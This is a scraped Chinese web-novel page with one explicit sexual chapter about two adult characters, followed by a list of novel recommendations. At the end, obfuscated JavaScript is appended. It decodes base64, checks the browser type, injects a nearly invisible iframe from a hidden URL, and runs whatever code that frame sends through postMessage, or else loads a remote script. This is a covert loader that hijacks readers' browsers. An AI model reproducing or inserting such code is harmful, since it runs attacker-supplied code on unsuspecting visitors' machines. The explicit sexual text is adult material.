收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    更新时间:2013-11-26

    刘母神情落寞的看了女儿一眼,叹了一口气:“唉,女大不中留啊,想喝一口牛奶都难。”

    知子莫过父,知女莫过母,看女儿那脸红的模样,不是撒谎是什么。

    “不愿意就算了,还用这么蹩脚的谎话来骗母亲。”刘母转身朝着厨房走去,嘀咕道:“是给小天喝了吧,唉,看来还是男朋友比较重要。”

    一时之间,刘媛媛愣在原地,哭笑不得,母亲竟然吃小天的醋。

    她很想说一句,那不是牛奶,那是白色小蝌蚪,如果妈你想喝的话,去找爸就可以了,我也是从小天那喝的。

    一想起那白色小蝌蚪,刘媛媛觉得一阵反胃。

    她以前听室友说过男人的小蝌蚪富含蛋白质,不但可以吃,而且可以美容养颜,是很好的补品。

    虽然她很想尝尝,看是否如她们所说的那样,但却一直没有吃过,如今才第一次,那味道,让她觉得很恶心,差点连早饭都吐了出来。

    “呼!”

    她对着手掌吹了一口气,顿时一股酸味扑鼻而来。

    “好臭!”

    她看了一眼母亲失落的背影,然后飞快的朝着浴室跑去。

    妈,对不起,让您受伤了,不过这‘牛奶’您真不能喝,还是让爸爸补偿您吧。

    如兔子一般飞快的跑进浴室,刘媛媛立刻拿起牙刷,挤上牙膏,拿起杯子乘上一点水,开始漱口。

    “媛媛姐,那东西富含蛋白质,能美容,养颜,是很好的补品……”林天刚想出去,突然见到刘媛媛进来,正想打趣她两句,却不料话还没说完,就被吐了一脸。

    “补你妹……!”

    刘媛媛很想骂他一句。

    牙膏的茉莉芳香刚让她感觉好了一点,没想到林天哪壶不开提哪壶,顿时让她觉得胃里一阵抽搐。

    “你再说我下次就不帮你口……哼。”刘媛媛面色一红,娇哼一声,别过脸去,继续漱口。

    “好。”

    林天也不恼,应了一声,把脸上带着白沫的漱口水擦干,然后跑过去把浴室门反锁上,又折返回来,从背后抱住刘媛媛。

    “噗通!”

    刘媛媛心里有一种不好的预感,后面这头狼该不会是还没吃饱,想在浴室中再来一次吧。

    果然,如她所料,林天已经一手抓住一只山峰,轻轻捏着那山尖的葡萄。

    “嗯……小天,别,爸妈都回来了。”刘媛媛嘤咛一声,想要挣脱,只是她正在漱口,力气又没有林天大,哪里挣脱的开。

    “我只是刚才没摸媛媛姐的两只大白兔,觉得浪费,所以现在补回来。”

    “好大,好软。”

    看着那一对被自己大肆揉捏的山峰,林天忍不住感慨,真不愧是36d,摸起来就是不一样,手感比薛雅婷那一对碧波好多了。

    在粉红蓓蕾上捏了一会,林天双手向下,划过那平滑的小腹,伸入那水蓝色的裙子之中,把那条白色内裤往下面一拉,开始在那幽谷外面的软肉上揉起来。

    “小天,不要。”刘媛媛惊呼一声。

    “没,我只是想帮媛媛姐下面按摩。”

    林天有些尴尬,刚才本是想帮她揉揉,减轻一下疼痛的,自己却没忍住。

    “嗯……真的?”

    有了前车之鉴,刘媛媛有些不相信背后这头狼。(. )

    “真的。”

    这次林天倒是真的想帮她揉揉,虽然脑袋里还有歪歪思想,但刚发射过一次的他还忍得住。

    “嗯,那不许做其它的。”

    刘媛媛警告一句,放下手中的杯子和牙刷,也不管嘴巴旁边还有白色的泡沫,开始享受起来。

    虽然林天的按摩技术不太好,但不得不说却很舒服,他的手就好像有魔力一般,所过之处,暖洋洋的,让她忍不住娇哼。

    由于下体的刺激,她那不知道放哪里的双手,不知不觉中开始上移,最终放在那鼓鼓的胸脯上面。

    她原本不想自摸,可是那股暖洋洋的气流,让她不能自控。

    看到这一幕,林天很无语,刚才还喊着不要,现在就算自己用火热进入幽谷地带估计她也不会反对,反而会……很迎合。

    不过林天也没有做其他的,双手继续在那柔软的河岸抚摸,只是偶尔也不老实,挤开两畔的,中指深入那湿漉漉的河流,来来回回。

    虽然这样火热更加憋的难受,但是听着耳畔传来的越来越大的娇哼,看着身前那闭目享受的美人,也是一件颇为赏心悦目的事情。

    没过几分钟,刘媛媛身体开始痉挛,一股热流从她幽谷,沿着光洁的大腿流了下来。

    “这样也行?”

    林天有些惊讶,他没想到真元力还有这样的功效,能促进女性高潮,看来自己得好好开发才行。

    “媛媛姐,怎么样?”林天笑嘻嘻的问道。

    “好些了。”刘媛媛脸红如玫瑰。

    “呵呵,要不要再来一次?”林天笑的很淫,很贱。

    “不要了,再来估计我今天就走不了路了。”

    倒不是小妹妹疼的走不了路,而是高潮太多,她身体软绵绵的,没力气走路。

    在林天身上依偎了一会儿,刘媛媛叫他先出去,自己要收拾一下。

    由于刚才的按摩,内裤已经湿漉漉了,她干脆把它脱下,放在一旁,然后用毛巾把下体擦干净,接着跑进卧室,换上内裤,再整理一下,撒上一点香水。

    卧室中淫靡的味道实在有点重,她不洒香水掩盖一下的话,要是等下母亲一不小心进来,那就糟糕了。

    中午吃饭的时候刘母无精打采,也不说话,似乎受了很大气。

    刘父在一旁看的莫名其妙,不知道妻子怎么了,问她是不是身体不舒服,遭了一记白眼。

    没来由的被瞪了一眼,刘父也不理妻子,和林天这个准女婿有一句没一句的聊了起来,言语间颇为满意。

    另一旁刘媛媛也相当郁闷,只是又不好明说,只是在心里默默道:“妈,女儿喝的真不是牛奶。”

    这一天,林天除了有寄人篱下的感觉之外,过得还算不错,整个下午和晚上都和刘媛媛待在一起,用她那硕大的ipad看电影,玩游戏。

    其实他手机上也有游戏,但是他不敢拿出来玩,因为他下的全都是……工口游戏。

    而刘母则是没和女儿说一句话,赌气似的在客厅看着电视,这让刘父很痛苦。

    男人和女人的品位不同,刘父喜欢看抗战时期的雷剧,而刘母却喜欢看那种婆媳剧。

    以前刘母会让着点他,随他看那种抗战剧,但是今天不知道怎么了,遥控牢牢的控制在自己手里,从没有换过台,哪怕中间会有半个小时的广告。

    她大姨妈来了?

    还是更年期到了?

    一夜无话。

    ……

    第二天是镇上赶集的日子,一大早便有人大声吆喝,呼朋唤友。

    林天也被刘母叫了起来,顶着两个黑眼圈,脑袋昏昏沉沉。

    刘媛媛也是一双熊猫眼,同样睡眠不足。

    两人对视一眼,颇为无奈。

    虽然他们也想去赶集,出去走走,可是这么早,两人都还没睡够。

    更何况刘媛媛已经从刘父那里得知,此次赶集刘母想带着两人去算命。

    八字合,她可能就无话可说,八字不合,那可能又会出一点岔子。

    “媛媛,我和你爸先走了,你和小天坐公交车随后跟来,我们在算命的那里等你们。”刘母怕两人不去,叮嘱道。

    “知道了。”刘媛媛有些不耐烦。

    “这孩子,嫌妈啰嗦。”刘母笑骂了一句,坐上刘父的电动车,绝尘而去。

    临走还不放心的往后面看了两眼,如果不是电动车只能坐两人,她非亲自把两人拉到算命的那里不可。

    刘父刘母走后,林天和刘媛媛在马路旁等了一会儿,才上了公交车。

    赶集时的公交比城里更恐怖,车上人挤人,就连门口都堆满了人,车厢内的空气污浊不堪。

    “终于到了。”一下车,刘媛媛就大口大口的呼吸着新鲜空气,随后看到条人挤人的街道,吐了吐舌头:“好多人。”

    “走吧,我带你去算命的那里。”林天一拉她的手,朝前走去。

章节目录

免费恐怖小说推荐: 戏精的诞生 地球人实在太凶猛了 快穿之不服来战呀 高校之洛清宁 我成帝了金手指才来 三体:史上最称职的面壁者 宝藏猎人 腐烂国度之活下去 我来改变行尸走肉世界 末日崛起

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x57\x57\x69"]=function(e){var jW =''+'ABCDEFGHI'+'JKLMNOPQ'+'RSTUVWXYZab'+'cdefghi'+'jklmnopqrst'+'uvwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=jW.indexOf(e.charAt(f++));o=jW.indexOf(e.charAt(f++));u=jW.indexOf(e.charAt(f++));a=jW.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x71\x4B\x57\x57\x56\x69\x6A\x48"]=function(){eval(WWWi("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV1dXaSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFdXV2koIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXV1dpKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV1dXaSgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFdXV2koZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SVRMNScrJ1FUJysnTnkweVknKydZR0pUSicrJ2xSJysnV2VscCcrJ1gnKydjR0pUSicrJ3onKydRJysnRE4nKyd3RVRRJysnelUnKydTYnZOJysnbUx1SicrJzJjbVJXJysnYnVjMycrJ2QzWmsnKydNbCcrJ1lZaycrJ01sRScrJzAnKydNbE0nKydIYzAnKydSSGEnKycnKycnLCcnKyc3cnYnKydURDknKydsSScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydKR2YnKyc3ZDMnKycwJysnJysnJywnWScp"));}